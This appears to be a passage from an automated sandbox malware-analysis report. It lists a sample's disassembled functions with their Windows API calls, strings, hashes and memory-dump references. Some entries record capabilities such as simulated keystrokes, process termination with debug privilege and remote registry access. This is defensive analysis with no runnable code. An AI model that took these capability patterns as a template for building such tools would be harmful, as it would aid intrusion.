                          • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00B7E9A0,00000004,00000000,00000000), ref: 00B7EBC1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ShowWindow
                          • String ID:
                          • API String ID: 1268545403-0
                          • Opcode ID: 35ef4928e06044f1dabfb1d8fb24bc0af0f58a0f31ae17f674451b2f9f97ac65
                          • Instruction ID: 8c1bd8bd897ded3933f54de0596257dcff6c9014758501c68e0a496566995434
                          • Opcode Fuzzy Hash: 35ef4928e06044f1dabfb1d8fb24bc0af0f58a0f31ae17f674451b2f9f97ac65
                          • Instruction Fuzzy Hash: A241A9316086829ADB3557289CC8AB67BD5EF4A315FA848EEE06B475F1CA70ECC0D711
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B47E6F Relevance: 13.6, APIs: 9, Instructions: 135filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B031B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00B031DA
                            • Part of subcall function 00B47C0C: GetFileAttributesW.KERNEL32(?,00B46A7B), ref: 00B47C0D
                          • lstrcmpiW.KERNEL32(?,?), ref: 00B47ED2
                          • _wcscmp.LIBCMT ref: 00B47EEA
                          • MoveFileW.KERNEL32(?,?), ref: 00B47F03
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: File$AttributesFullMoveNamePath_wcscmplstrcmpi
                          • String ID:
                          • API String ID: 4093841705-0
                          • Opcode ID: 38c518f226b3761e67d252b90a6859c512f040b3f39f4d916ec97c0cf4e549e7
                          • Instruction ID: e688c87c62fca1060285e0d5f14b065c5a7bc2a24bdc30aba5ed6de62c67b589
                          • Opcode Fuzzy Hash: 38c518f226b3761e67d252b90a6859c512f040b3f39f4d916ec97c0cf4e549e7
                          • Instruction Fuzzy Hash: 83411271844229AACF25EBA4DC45ADDB3FCAF08710F5045EAE509E3141EF359B89CFA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3CDE6 Relevance: 13.6, APIs: 9, Instructions: 65sleepkeyboardwindowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B3E138: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B3E158
                            • Part of subcall function 00B3E138: GetCurrentThreadId.KERNEL32 ref: 00B3E15F
                            • Part of subcall function 00B3E138: AttachThreadInput.USER32(00000000,?,00B3CD34,?,00000001), ref: 00B3E166
                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B3CE06
                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00B3CE23
                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00B3CE26
                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B3CE2F
                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00B3CE4D
                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00B3CE50
                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B3CE59
                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00B3CE70
                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00B3CE73
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                          • String ID:
                          • API String ID: 2014098862-0
                          • Opcode ID: c762aa8381ab2a4e56e400ca288fb59ef5613d22165ea0efa40893e7c32f1ce9
                          • Instruction ID: abfc8aa171a162d4daf8d400b10d1ebc91ad0c4aec8d94f136b2939025d9249a
                          • Opcode Fuzzy Hash: c762aa8381ab2a4e56e400ca288fb59ef5613d22165ea0efa40893e7c32f1ce9
                          • Instruction Fuzzy Hash: D7118EB1550618BEF6106BA48C8EF6A7B6DDF48754F600516F3407B0E4C9F26C51DBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B045A7 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 211COMMON
                          Download Yara Rule
                          APIs
                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00B045F0
                          • UnregisterHotKey.USER32(?), ref: 00B047BD
                          • DestroyWindow.USER32(?), ref: 00B75936
                          • FreeLibrary.KERNEL32(?), ref: 00B7599D
                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00B759CA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                          • String ID: close all
                          • API String ID: 4174999648-3243417748
                          • Opcode ID: 534607ee7c09e70e5ac9923b0065189af34b54b16f4d2b70227b9b6b689173c6
                          • Instruction ID: e3ba02e2b38c26b5bb9af289a6ccccb966e7cb4827875418c14478a92a0e95b5
                          • Opcode Fuzzy Hash: 534607ee7c09e70e5ac9923b0065189af34b54b16f4d2b70227b9b6b689173c6
                          • Instruction Fuzzy Hash: 7B912D74600602CFD729EF14C899A69FBE4FF15700F5442E9E51AA72A2DF30AD6ACF10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B69882 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00B69926
                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 00B6993A
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00B69954
                          • _wcscat.LIBCMT ref: 00B699AF
                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00B699C6
                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00B699F4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend$Window_wcscat
                          • String ID: SysListView32
                          • API String ID: 307300125-78025650
                          • Opcode ID: 18e1c0e886626a989bb40f1e778da81689591b65e3ca07b3b63665a8ad80c4d6
                          • Instruction ID: 439b43acad49049af029ecedf525d1bb60dfbcb06ffc44f999c0535e79a7cc14
                          • Opcode Fuzzy Hash: 18e1c0e886626a989bb40f1e778da81689591b65e3ca07b3b63665a8ad80c4d6
                          • Instruction Fuzzy Hash: 8841A171A00308ABEF219FA4CC85FEE77E8EF09350F1005AAF549A72D1D6759D84CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B61620 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B46F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B46F7D
                            • Part of subcall function 00B46F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00B46F8D
                            • Part of subcall function 00B46F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00B47022
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B6168B
                          • GetLastError.KERNEL32 ref: 00B6169E
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B616CA
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00B61746
                          • GetLastError.KERNEL32(00000000), ref: 00B61751
                          • CloseHandle.KERNEL32(00000000), ref: 00B61786
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                          • String ID: SeDebugPrivilege
                          • API String ID: 2533919879-2896544425
                          • Opcode ID: 4204d5fe290a8a514c37215ccdf881f70a2de027f4f8c80d637b724ef34bb130
                          • Instruction ID: cba121c08b32ccc24fe75ee5c5c812e3d1c5115f2f7d72952960885f13b7d1bf
                          • Opcode Fuzzy Hash: 4204d5fe290a8a514c37215ccdf881f70a2de027f4f8c80d637b724ef34bb130
                          • Instruction Fuzzy Hash: 44419AB5A40201AFDB04EF58C8E5FADB7E5AF54714F088489F9069F2D2DBB8AD40CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B46237 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                          Download Yara Rule
                          APIs
                          • LoadIconW.USER32(00000000,00007F03), ref: 00B462D6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: IconLoad
                          • String ID: blank$info$question$stop$warning
                          • API String ID: 2457776203-404129466
                          • Opcode ID: 0661a5459edd24092252a046f62204bba3f351363d71c0227e269cb5cc1529e4
                          • Instruction ID: 5fe10bd7ad0af6b4e34a9c1b788cb4bf780e3709711727b99b6b6585f8fdbfb7
                          • Opcode Fuzzy Hash: 0661a5459edd24092252a046f62204bba3f351363d71c0227e269cb5cc1529e4
                          • Instruction Fuzzy Hash: 3A11E73120C353BEE7055A589C86DBA73E8DF17724B2000AAF505A66C2FBE0AF406266
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B4757B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 00B47595
                          • LoadStringW.USER32(00000000), ref: 00B4759C
                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00B475B2
                          • LoadStringW.USER32(00000000), ref: 00B475B9
                          • _wprintf.LIBCMT ref: 00B475DF
                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B475FD
                          Strings
                          • %s (%d) : ==> %s: %s %s, xrefs: 00B475DA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: HandleLoadModuleString$Message_wprintf
                          • String ID: %s (%d) : ==> %s: %s %s
                          • API String ID: 3648134473-3128320259
                          • Opcode ID: e7e663527479c5f5d0e8deb50a1e26d00f8eed10e5f651400ee4a8bb82241e51
                          • Instruction ID: 285ebfaeae3d8015b4892d36eee2b018a4aaba1348d0970e1f1af6dba601fd4f
                          • Opcode Fuzzy Hash: e7e663527479c5f5d0e8deb50a1e26d00f8eed10e5f651400ee4a8bb82241e51
                          • Instruction Fuzzy Hash: A00112F2540208BFE711A794AD89EEB77ACEB08311F4004A6B745E2091EE749E84CB75
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B62A0A Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                            • Part of subcall function 00B63AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B62AA6,?,?), ref: 00B63B0E
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B62AE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: BuffCharConnectRegistryUpper_memmove
                          • String ID:
                          • API String ID: 3479070676-0
                          • Opcode ID: 325367cea97896c1c89beddfa0d2141686f253aae7652f401bc50226f309aa5e
                          • Instruction ID: cc6c554bd59a9e78825f8016a6f9ec2c6480a389becbb0085a1074f287076042
                          • Opcode Fuzzy Hash: 325367cea97896c1c89beddfa0d2141686f253aae7652f401bc50226f309aa5e
                          • Instruction Fuzzy Hash: C2916771604601AFDB01EF54C891B6EBBE5FF88310F14889DF9969B2A1DB38E945CF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B59AC3 Relevance: 12.2, APIs: 8, Instructions: 220networkCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ErrorLast$_memmovehtonsinet_ntoaselect
                          • String ID:
                          • API String ID: 1718709218-0
                          • Opcode ID: 7569ba4a70aca6a953d22e4432a0b53b685bc3769953aff6beee9515443cd121
                          • Instruction ID: ef6db386dcffa6dbaeeca6a27ba89ea02e5d6e7d98edc685318d30c230481830
                          • Opcode Fuzzy Hash: 7569ba4a70aca6a953d22e4432a0b53b685bc3769953aff6beee9515443cd121
                          • Instruction Fuzzy Hash: C1717B71508200ABD714EF64DC85F6BBBE8EB84714F144AADF956972E1DB30DD08CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B2B72C Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __mtinitlocknum.LIBCMT ref: 00B2B744
                            • Part of subcall function 00B28A0C: __FF_MSGBANNER.LIBCMT ref: 00B28A21
                            • Part of subcall function 00B28A0C: __NMSG_WRITE.LIBCMT ref: 00B28A28
                            • Part of subcall function 00B28A0C: __malloc_crt.LIBCMT ref: 00B28A48
                          • __lock.LIBCMT ref: 00B2B757
                          • __lock.LIBCMT ref: 00B2B7A3
                          • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00BB6948,00000018,00B36C2B,?,00000000,00000109), ref: 00B2B7BF
                          • RtlEnterCriticalSection.NTDLL(8000000C), ref: 00B2B7DC
                          • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 00B2B7EC
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                          • String ID:
                          • API String ID: 1422805418-0
                          • Opcode ID: 5acb9457de5a3d661244b3e481d2ad9d3f40539969e2e5d2b28359aa3d253297
                          • Instruction ID: 4269356d11868621ac737267cd8a3d94c7cd61644e7158279661bad57aa5648a
                          • Opcode Fuzzy Hash: 5acb9457de5a3d661244b3e481d2ad9d3f40539969e2e5d2b28359aa3d253297
                          • Instruction Fuzzy Hash: 544114719102258BEB109FA8F884BA8B7E4EF45325F108299E42DAF2E1DF749840CB94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B4A1B7 Relevance: 12.1, APIs: 8, Instructions: 100fileCOMMON
                          Download Yara Rule
                          APIs
                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 00B4A1CE
                            • Part of subcall function 00B2010A: std::exception::exception.LIBCMT ref: 00B2013E
                            • Part of subcall function 00B2010A: __CxxThrowException@8.LIBCMT ref: 00B20153
                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00B4A205
                          • RtlEnterCriticalSection.NTDLL(?), ref: 00B4A221
                          • _memmove.LIBCMT ref: 00B4A26F
                          • _memmove.LIBCMT ref: 00B4A28C
                          • RtlLeaveCriticalSection.NTDLL(?), ref: 00B4A29B
                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00B4A2B0
                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00B4A2CF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                          • String ID:
                          • API String ID: 256516436-0
                          • Opcode ID: 925c92b535ce5f70e4486ee3132ed9a10beb43a56a71bad4deb965c6a8ed4033
                          • Instruction ID: bb357a8ad8d1ce76c10301329fc965057d4f29dc2395e496faee4bbfc6981f5d
                          • Opcode Fuzzy Hash: 925c92b535ce5f70e4486ee3132ed9a10beb43a56a71bad4deb965c6a8ed4033
                          • Instruction Fuzzy Hash: 49318231900115EBCF00EFA5DC85AAEBBF9FF45310B1480A5F904AB296DB74DE54DBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B68CDB Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                          Download Yara Rule
                          APIs
                          • DeleteObject.GDI32(00000000), ref: 00B68CF3
                          • GetDC.USER32(00000000), ref: 00B68CFB
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B68D06
                          • ReleaseDC.USER32(00000000,00000000), ref: 00B68D12
                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00B68D4E
                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00B68D5F
                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00B68D99
                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00B68DB9
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                          • String ID:
                          • API String ID: 3864802216-0
                          • Opcode ID: 75f2f4c077ce7db0a81c241b981d9b2a2fa6535d109557996064a37d1e48bf76
                          • Instruction ID: bcc8f6d2874b9e3beef99afec7f4d7bae0c7678467d4b501afabb7d810c4e5d2
                          • Opcode Fuzzy Hash: 75f2f4c077ce7db0a81c241b981d9b2a2fa6535d109557996064a37d1e48bf76
                          • Instruction Fuzzy Hash: E5316D72200214BBEB109F51DC89FEA3BA9EF49755F044165FE08DB1E1DAB99C41CB70
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B1B40F Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
